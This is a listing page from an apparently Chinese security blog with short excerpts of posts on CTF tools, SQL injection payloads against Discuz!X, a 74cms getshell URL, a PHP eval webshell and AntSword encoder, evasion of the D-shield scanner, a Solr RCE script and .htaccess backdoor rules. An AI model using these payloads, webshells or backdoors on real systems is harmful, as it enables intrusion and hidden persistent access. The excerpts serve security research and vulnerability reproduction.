CTF-Tools

CTF-Tools

CTF-Tools一款CTF编码、解码、加密、解密工具。支持的编码解码:URL-UTF-8 URL-GB2312UnicodeEscape(%U)HtmlEncodeACSIIBase16Base32Base64Str->HexShellcode支持的加密解密:Rot13凯撒密码栅栏密码培根密码摩斯密码移位密码云影密码当铺密码维尼吉亚密码进制转换:2->82->102->168->28->108->1610->210->810->1616->216->816->10任意进制转换在线编码网站...

安全工具 2020-01-07 PM 32℃ 0条
[安全工具]SQL-Injection-Assistant

[安全工具]SQL-Injection-Assistant

SQL-Injection-Assistant最近闲来无事,自己写了一款工具。如下图此工具采用Pyqt开发,源码已上传至github您可以去github下载源码进行修改。安装开发环境1.安装好Python3的环境添加环境变量,保证安装正确,2.安装PyQt5采用命令安装,Win+R,输入CMD,打开命令框,输入以下命令。后面是豆瓣的镜像地址,是为了加快下载速度。pip install PyQt5 -i https://pypi.douban.com/simple 3.安装Qt的工具包pip install PyQt5-tools -i https://pypi.douban.com/si...

安全工具 2019-12-19 PM 47℃ 0条
Discuz!X系列全版本后台sql注入复现

Discuz!X系列全版本后台sql注入复现

圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。2、将upaod放置到网站目录下,访问安装目录安装即可。0x02 漏洞复现点击站长--UCenter设置 点击最下面的提交进行抓包判断列数1' order by 1 //返回正确 1' order by 2 //返回错误 查询当前用户1' and updatexml(1,concat(0x7e,(SELECT user())),1)-- a查询版本1' and updatexml(1,concat(...

渗透测试 2019-12-11 PM 58℃ 0条
74cms v4.2.1-v4.2.129-后台getshell漏洞复现

74cms v4.2.1-v4.2.129-后台getshell漏洞复现

0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装0x02 复现过程当前版本v4.2.111点加工具,点击风格模板Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0.0.1/74cms/Application/Home/Conf/config.php直接访问后端代码GETSHELLhttp://127....

渗透测试 2019-12-09 PM 43℃ 0条
随机异或无限免杀D盾之再免杀

随机异或无限免杀D盾之再免杀

        观摩大佬的文章后,想着把大佬写好的脚本copy下来,利用一翻,结果很遗憾的是报错了。。(可能是我比较菜)随之,自己研究了一番,发现D盾查杀木马查的是__destruct函数,以下为yzddmr6大佬的脚本生成的马,目前D盾直接5级,已经无法过D盾。<?phpclass PXGF{         function __destruct(){    &nbs...

Web安全 2019-11-22 PM 37℃ 0条
蚁剑编码之rot13->base64->字符串反转脚本

蚁剑编码之rot13->base64->字符串反转脚本

编码器脚本。/** <?php @eval(str_rot13(base64_decode(strrev($_POST['ant']))));?> **/ 'use strict'; module.exports = (pwd, data, ext={}) => {   const rot13encode = (s) => {     ...

Web安全 2019-11-19 PM 36℃ 0条
蚂蚁宝库--确定不来看看吗?

蚂蚁宝库--确定不来看看吗?

https://qianxiao996.cn/wenzhang/欢迎留言!

安全工具 2019-11-12 AM 113℃ 1条
Apache_Solr_RCE_via_Velocity_template

Apache_Solr_RCE_via_Velocity_template

import requests import json import sys def get_name(url): print "[-] Get core name." url += "/solr/admin/cores?wt=json&indexInfo=false" conn = requests.request("GET", url=url) name = "test" try: name = list(json.loads(conn.text)["status"])[0] except...

Web安全 2019-10-31 PM 31℃ 0条
.htaccess文件构成的PHP后门

.htaccess文件构成的PHP后门

1、.htaccess文件2、文件上传绕过一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt写入(png解析为php)AddType application/x-httpd-php .png另存为.htaccess 上传.htaccess 必须是网站根路径3、留后门可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析成php<FilesMatch "1">  SetHandler application/x-httpd-php  <...

Web安全,权限维持 2019-10-31 PM 58℃ 0条